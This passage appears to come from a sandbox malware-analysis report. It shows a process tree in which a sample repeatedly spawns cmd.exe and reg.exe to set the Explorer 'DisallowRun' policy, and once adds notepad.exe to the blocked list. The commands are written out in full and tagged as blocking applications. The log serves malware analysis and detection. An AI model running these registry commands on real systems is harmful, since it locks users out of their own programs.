      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1304
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4160
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3432
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3156
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4916
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4604
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:484
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4800
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4716
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1952
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5068
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3124
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:1600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2012
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1308
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4240
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2296
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:324
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5000
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3876
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4532
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:7092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2812
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:1872
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3492
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1916
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2144
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:5860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4860
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5060
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:996
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3008
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4516
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4248
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1660
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:5952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4152
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1664
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4908
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:224
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2128
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:5920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1944
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:6436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5148
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5196
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5256
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5316
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5428
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5360
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5520
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5420
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5528
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5512
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:8132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5548
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5600
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:7388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5592
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:8156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5708
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5792
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:7404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5868
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:8100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5960
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:8092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6036
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:8164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6100
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5252
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5140
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:7228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4312
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6412
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5492
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:7084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6032
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6148
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6176
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5020
- - C:\Windows\system32\cmd.exe
